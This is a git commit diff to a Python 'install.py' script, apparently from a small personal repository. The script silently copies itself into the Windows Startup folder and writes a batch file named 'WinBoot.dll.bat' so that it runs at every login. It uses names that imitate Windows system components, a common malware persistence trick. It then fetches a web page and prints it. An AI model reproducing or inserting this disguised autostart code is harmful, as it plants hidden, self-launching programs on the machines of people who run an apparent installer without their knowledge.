Update install.py

This commit is contained in:
heckeralt 2024-09-19 12:10:31 -04:00
parent fbf177cdbe
commit 9ca2a3ff15
1 changed files with 2 additions and 2 deletions

View File

@ -1,8 +1,8 @@
import os
import time
import requests
os.system("copy WindowsBootService.py %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup")
os.system("echo py WindowsBootService.py > %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinBoot.dll.bat")
os.system("copy install.py %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup")
os.system("echo py install.py > %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinBoot.dll.bat")
x = requests.get('https://yandex.ru')
time.sleep(1)
print(x.text)